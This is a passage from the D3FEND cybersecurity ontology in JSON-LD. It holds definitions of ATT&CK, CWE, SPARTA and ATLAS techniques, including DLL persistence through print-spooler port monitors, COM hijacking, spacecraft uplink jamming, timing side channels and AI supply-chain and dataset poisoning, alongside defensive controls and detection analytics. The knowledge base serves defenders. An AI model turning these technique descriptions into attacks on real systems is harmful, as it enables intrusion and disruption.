      "d3f:attack-id": "T1547.010",
      "d3f:definition": "Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in <code>C:\\Windows\\System32</code> and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Port Monitors",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N972db9505f584aa1bc901540c8c0737d"
        }
      ]
    },
    {
      "@id": "_:N972db9505f584aa1bc901540c8c0737d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-358",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-358",
      "d3f:definition": "The product does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique.",
      "rdfs:label": "Improperly Implemented Security Check for Standard",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "wptmp:entity#Reference%20-%20%20CAR-2016-04-004:%20Successful%20Local%20Account%20Login",
      "d3f:kb-organization": "MITRE/NSA"
    },
    {
      "@id": "d3f:T1087.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1087.003",
      "d3f:definition": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)",
      "rdfs:label": "Email Account",
      "rdfs:subClassOf": {
        "@id": "d3f:T1087"
      }
    },
    {
      "@id": "d3f:PasswordFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Simple form of password database held in a single file (e.g., /etc/password)",
      "rdfs:label": "Password File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:PasswordDatabase"
        }
      ]
    },
    {
      "@id": "d3f:T1107",
      "@type": "owl:Class",
      "d3f:attack-id": "T1107",
      "d3f:definition": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1070.004",
      "rdfs:label": "File Deletion",
      "rdfs:seeAlso": {
        "@id": "d3f:T1070.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:TA0031",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Credential Access - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Credential Access"
    },
    {
      "@id": "d3f:ApplicationConfigurationHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ApplicationConfigurationHardening"
      ],
      "d3f:d3fend-id": "D3-ACH",
      "d3f:definition": "Modifying an application's configuration to reduce its attack surface.",
      "d3f:hardens": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "d3f:kb-article": "## How it works\nApplication configuration settings can be configured to limit the permissions on an application or disable certain vulnerable application features.\n\nHardening an application's configuration involves analyzing not only the application but also the environment in which the application is run in for potential vulnerabilities.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-RedHatEnterpriseLinux8SecurityTechnicalImplementationGuide"
        },
        {
          "@id": "d3f:Reference-Windows10STIG"
        }
      ],
      "rdfs:label": "Application Configuration Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N34bf2617194545c8b6ad7b7e62b37b02"
        }
      ]
    },
    {
      "@id": "_:N34bf2617194545c8b6ad7b7e62b37b02",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:CCI-002688_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system discovers indicators of compromise.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002688"
    },
    {
      "@id": "d3f:AML.T0043.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043.000",
      "d3f:definition": "In White-Box Optimization, the adversary has full access to the target model and optimizes the adversarial example directly.\nAdversarial examples trained in this manner are most effective against the target model.",
      "rdfs:label": "White-Box Optimization - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0043"
      },
      "skos:prefLabel": "White-Box Optimization"
    },
    {
      "@id": "d3f:Attacker",
      "@type": "owl:Class",
      "d3f:definition": "An agent that attempts to exploit vulnerabilities to gain unauthorized access to data or systems.",
      "rdfs:label": "Attacker",
      "rdfs:subClassOf": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:Reference-SuspiciousRunLocations_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-05-002/"
      },
      "d3f:kb-abstract": "In Windows, files should never execute out of certain directory locations. Any of these locations may exist for a variety of reasons, and executables may be present in the directory but should not execute. As a result, some defenders make the mistake of ignoring these directories and assuming that a process will never run from one. There are known TTPs that have taken advantage of this fact to go undetected. This fact should inform defenders to monitor these directories more closely, knowing that they should never contain running processes.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-05-002: Suspicious Run Locations",
      "rdfs:label": "Reference - CAR-2013-05-002: Suspicious Run Locations - MITRE"
    },
    {
      "@id": "d3f:OTSetTimeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Set timing mechanisms.",
      "rdfs:label": "OT Set Time Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTTimeCommandEvent"
        },
        {
          "@id": "_:N4ca60d039e364852ba243059517f8556"
        }
      ]
    },
    {
      "@id": "_:N4ca60d039e364852ba243059517f8556",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTSetTimeCommand"
      }
    },
    {
      "@id": "d3f:AML.T0010",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010",
      "d3f:definition": "Adversaries may gain initial access to a system by compromising the unique portions of the AI supply chain.\nThis could include [Hardware](/techniques/AML.T0010.000), [Data](/techniques/AML.T0010.002) and its annotations, parts of the AI [AI Software](/techniques/AML.T0010.001) stack, or the [Model](/techniques/AML.T0010.003) itself.\nIn some instances the attacker will need secondary access to fully carry out an attack using compromised components of the supply chain.",
      "rdfs:label": "AI Supply Chain Compromise - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASInitialAccessTechnique"
      },
      "skos:prefLabel": "AI Supply Chain Compromise"
    },
    {
      "@id": "d3f:SPARTATechnique",
      "@type": "owl:Class",
      "d3f:definition": "SPARTA Techniques represent 'how' a threat actor achieves a tactical goal by performing a threat action.",
      "rdfs:label": "SPARTA Technique",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/SPARTA"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAThing"
      }
    },
    {
      "@id": "d3f:LinuxSocket",
      "@type": "owl:Class",
      "d3f:definition": "Create an endpoint for communication.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/socket.2.html"
      },
      "rdfs:label": "Linux Socket",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateSocket"
      }
    },
    {
      "@id": "d3f:REC-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0004",
      "d3f:definition": "Adversaries collect structured launch intelligence to forecast when and how mission assets will transition through their most time-compressed, change-prone phase. Useful elements include the launch date/time windows, launch site and range operator, participating organizations (launch provider, integrator, range safety, telemetry networks), vehicle family and configuration, fairing type, and upper-stage restart profiles. This picture enables realistic social-engineering pretexts, supply-chain targeting of contractors, and identification of auxiliary systems (range instrumentation, TLM/FTS links) that may be less hardened than the spacecraft itself. Knowledge of ascent comms (bands, beacons, ground stations), early-orbit operations (LEOP) procedures, and handovers to mission control further informs when authentication, staffing, or telemetry margins may be tight.",
      "rdfs:label": "Gather Launch Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Launch Information"
    },
    {
      "@id": "d3f:Estimation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EST",
      "d3f:definition": "Estimation represents ways or a process of learning and determining the population parameter based on the model fitted to the data.",
      "d3f:kb-article": "## References\nPennsylvania State University. (n.d.). Statistical Inference and Estimation. [Link](https://online.stat.psu.edu/stat504/lesson/statistical-inference-and-estimation)",
      "rdfs:label": "Estimation",
      "rdfs:subClassOf": {
        "@id": "d3f:InferentialStatistics"
      }
    },
    {
      "@id": "d3f:AML.T0017",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0017",
      "d3f:definition": "Adversaries may develop their own capabilities to support operations. This process encompasses identifying requirements, building solutions, and deploying capabilities. Capabilities used to support attacks on AI-enabled systems are not necessarily AI-based themselves. Examples include setting up websites with adversarial information or creating Jupyter notebooks with obfuscated exfiltration code.",
      "rdfs:label": "Develop Capabilities - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0017"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Develop Capabilities"
    },
    {
      "@id": "d3f:T1481.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1481.002",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to and receiving output from a compromised system. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.",
      "rdfs:label": "Bidirectional Communication - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1481"
      },
      "skos:prefLabel": "Bidirectional Communication"
    },
    {
      "@id": "d3f:M1018",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemCallFiltering"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "User Account Management"
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-005%3ABITSAdminDownloadFile_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-005/"
      },
      "d3f:kb-abstract": "The following query identifies Microsoft Background Intelligent Transfer Service utility bitsadmin.exe using the transfer parameter to download a remote object. In addition, look for download or upload on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from bitsadmin.exe, but the artifacts will appear in a parallel process of svchost.exe with a command-line similar to svchost.exe -k netsvcs -s BITS. It’s important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use bitsadmin /list /verbose to list out the jobs during investigation.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-005: BITSAdmin Download File",
      "rdfs:label": "Reference - CAR-2021-05-005: BITSAdmin Download File - MITRE"
    },
    {
      "@id": "d3f:CCI-002470_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system only allows the use of organization-defined certificate authorities for verification of the establishment of protected sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:Certificate-basedAuthentication"
        },
        {
          "@id": "d3f:CertificatePinning"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002470"
    },
    {
      "@id": "d3f:WiredLink",
      "@type": "owl:Class",
      "d3f:definition": "A physical link that uses a physical conductor or waveguide to constrain and direct signal propagation between endpoints. The signal is confined within or along a manufactured medium such as metal conductors, optical fibers, or coaxial structures.",
      "rdfs:label": "Wired Link",
      "rdfs:subClassOf": {
        "@id": "d3f:PhysicalLink"
      }
    },
    {
      "@id": "d3f:TertiaryStorage",
      "@type": "owl:Class",
      "d3f:definition": "Tertiary storage or tertiary memory is memory primarily used for archiving rarely accessed information. It is primarily useful for extraordinarily large data stores. Typical examples include tape libraries and optical jukeboxes.",
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/Computer_data_storage#Tertiary_storage"
      },
      "rdfs:label": "Tertiary Storage",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:SecondaryStorage"
        }
      ]
    },
    {
      "@id": "d3f:EX-0016.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0016.01",
      "d3f:definition": "The attacker transmits toward the spacecraft’s uplink receive antenna, within its main lobe or significant sidelobes, at the operating frequency and sufficient power spectral density to drive the uplink Eb/N₀ below the demodulator’s threshold. Uplink jamming prevents acceptance of telecommands and ranging/acquisition traffic, delaying or blocking scheduled operations. Because the receiver resides on the spacecraft, the jammer must be located within the spacecraft’s receive footprint and match its polarization and Doppler conditions well enough to couple energy into the front end.",
      "d3f:impairs": {
        "@id": "d3f:Receiver"
      },
      "d3f:jams": {
        "@id": "d3f:WirelessLink"
      },
      "rdfs:label": "Uplink Jamming - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0016/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0016"
        },
        {
          "@id": "_:N9daba428be63465798ff18fa8a00b95c"
        },
        {
          "@id": "_:N4d783aee9e1246d39a240c3f64b9c09c"
        }
      ],
      "skos:prefLabel": "Uplink Jamming"
    },
    {
      "@id": "_:N9daba428be63465798ff18fa8a00b95c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:impairs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "_:N4d783aee9e1246d39a240c3f64b9c09c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:jams"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WirelessLink"
      }
    },
    {
      "@id": "d3f:T1435",
      "@type": "owl:Class",
      "d3f:attack-id": "T1435",
      "d3f:definition": "An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1636.001",
      "rdfs:label": "Access Calendar Entries - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1636.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Access Calendar Entries"
    },
    {
      "@id": "d3f:EXF-0002.04",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002.04",
      "d3f:definition": "Execution time varies with inputs and branches; precise measurement turns that variance into information. The attacker times acknowledgments, response latencies, or framing gaps to learn which code paths ran (e.g., MAC verified vs. failed, table entry present vs. absent) and to infer bits of secrets in timing-sensitive routines such as cryptographic checks. On resource-constrained processors and deterministic RTOSes, small differences persist across runs, making remote timing feasible over RF if clocks and propagation are accounted for. Combined with chosen inputs and statistics, these measurements leak internal state faster than brute-force cryptanalysis.",
      "rdfs:label": "Timing Attacks - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0002"
      },
      "skos:prefLabel": "Timing Attacks"
    },
    {
      "@id": "d3f:T1057",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1057",
      "d3f:definition": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:GetRunningProcesses"
        }
      ],
      "rdfs:label": "Process Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:Ncc40d95bf4384af0986c9f6eb15bba77"
        },
        {
          "@id": "_:N7c7a60885eba48629a0ca6ad09056b3f"
        }
      ]
    },
    {
      "@id": "_:Ncc40d95bf4384af0986c9f6eb15bba77",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N7c7a60885eba48629a0ca6ad09056b3f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetRunningProcesses"
      }
    },
    {
      "@id": "d3f:T0875",
      "@type": "owl:Class",
      "d3f:attack-id": "T0875",
      "d3f:definition": "Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Change Program State - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSExecutionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
        }
      ],
      "skos:prefLabel": "Change Program State"
    },
    {
      "@id": "d3f:CCI-001115_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, at managed interfaces, denies network traffic and audits internal users (or malicious code) posing a threat to external information systems.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001115"
    },
    {
      "@id": "d3f:CWE-1080",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1080",
      "d3f:definition": "A source code file has too many lines of code.",
      "rdfs:label": "Source Code File with Excessive Number of Lines of Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:T1630.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1630.003",
      "d3f:definition": "An adversary could use knowledge of the techniques used by security software to evade detection.(Citation: Brodie)(Citation: Tan) For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection.(Citation: Rastogi)",
      "rdfs:label": "Disguise Root/Jailbreak Indicators - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1630"
      },
      "skos:prefLabel": "Disguise Root/Jailbreak Indicators"
    },
    {
      "@id": "d3f:T1042",
      "@type": "owl:Class",
      "d3f:attack-id": "T1042",
      "d3f:definition": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.001",
      "rdfs:label": "Change Default File Association",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:LogicProgramming",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LP",
      "d3f:definition": "Logic programming is a programming paradigm which is largely based on formal logic.",
      "d3f:kb-article": "## How it works\nAny program written in a logic programming language is a set of sentences in logical form, expressing facts and rules about some problem domain. Major logic programming language families include Prolog, answer set programming (ASP) and Datalog. In all of these languages, rules are written in the form of clauses:\n\nH :- B_1, ..., B_n.\n\n## References\n1. Logic programming. (2023, May 29). In _Wikipedia_. [Link]( https://en.wikipedia.org/wiki/Logic_programming)",
      "rdfs:label": "Logic Programming",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:DS0028",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:broader": {
        "@id": "d3f:LoginSession"
      },
      "d3f:definition": "Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization",
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Login Session Metadata component",
      "rdfs:label": "Logon Session (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1546.015",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.015",
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry.",
      "d3f:loads": {
        "@id": "d3f:ExecutableBinary"
      },
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "Component Object Model Hijacking",
      "rdfs:seeAlso": {
        "@id": "dbr:Component_Object_Model"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Ne98942baf11948769a3ef50922437622"
        },
        {
          "@id": "_:N8da0e2c502ab4aaa88c60c23cf78b1fb"
        }
      ]
    },
    {
      "@id": "_:Ne98942baf11948769a3ef50922437622",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "_:N8da0e2c502ab4aaa88c60c23cf78b1fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:CWE-409",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-409",
      "d3f:definition": "The product does not handle or incorrectly handles a compressed input with a very high compression ratio that produces a large output.",
      "rdfs:label": "Improper Handling of Highly Compressed Data (Data Amplification)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:CCI-001401_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system supports and maintains the binding of organization-defined security attributes to information in transmission.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001401"
    },
    {
      "@id": "d3f:OSAPICreateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that creates a new process within the system.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "OS API Create Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N7541080e9f6d4366aaaa5b4fca546bca"
        }
      ]
    },
    {
      "@id": "_:N7541080e9f6d4366aaaa5b4fca546bca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:published",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date of publication of the resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date published"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:CWE-182",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-182",
      "d3f:definition": "The product filters data in a way that causes it to be reduced or \"collapsed\" into an unsafe value that violates an expected security property.",
      "rdfs:label": "Collapse of Data into Unsafe Value",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-693"
        },
        {
          "@id": "d3f:CWE-707"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1323",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1323",
      "d3f:definition": "Trace data collected from several sources on the System-on-Chip (SoC) is stored in unprotected locations or transported to untrusted agents.",
      "rdfs:label": "Improper Management of Sensitive Trace Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:AML.T0059",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0059",
      "d3f:definition": "Adversaries may poison or manipulate portions of a dataset to reduce its usefulness, reduce trust, and cause users to waste resources correcting errors.",
      "rdfs:label": "Erode Dataset Integrity - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0059"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "Erode Dataset Integrity"
    },
    {
      "@id": "d3f:OTModeSwitch",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:controls": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "d3f:definition": "Keyswitch or mode switch is the mechanism for changing the operating mode of an OT controller or device.",
      "d3f:synonym": [
        "Mode Switch",
        "Programming Key Switch"
      ],
      "rdfs:comment": "An OT Mode Switch is a dedicated mechanism, implemented as either a physical keyswitch or a software control, that permits authorized users to transition an OT controller between its operating modes.",
      "rdfs:label": "OT Mode Switch",
      "rdfs:seeAlso": [
        {
          "@id": "https://isagca.org/hubfs/2023%20ISA%20Website%20Redesigns/ISAGCA/PDFs/Industrial%20Cybersecurity%20Knowledge%20FINAL.pdf?hsLang=en"
        },
        {
          "@id": "https://www.dragos.com/blog/industry-news/value-of-plc-key-switch-monitoring/"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationConfiguration"
        },
        {
          "@id": "_:N80db4facbac949f7add3157ee6081fa1"
        }
      ]
    },
    {
      "@id": "_:N80db4facbac949f7add3157ee6081fa1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:controls"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:ATLASPersistenceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0006"
      },
      "rdfs:label": "Persistence Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Na3f63a622ed24472b868749ef567777c"
        }
      ],
      "skos:prefLabel": "Persistence Technique"
    },
    {
      "@id": "_:Na3f63a622ed24472b868749ef567777c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0006"
      }
    },
    {
      "@id": "d3f:T0891",
      "@type": "owl:Class",
      "d3f:attack-id": "T0891",
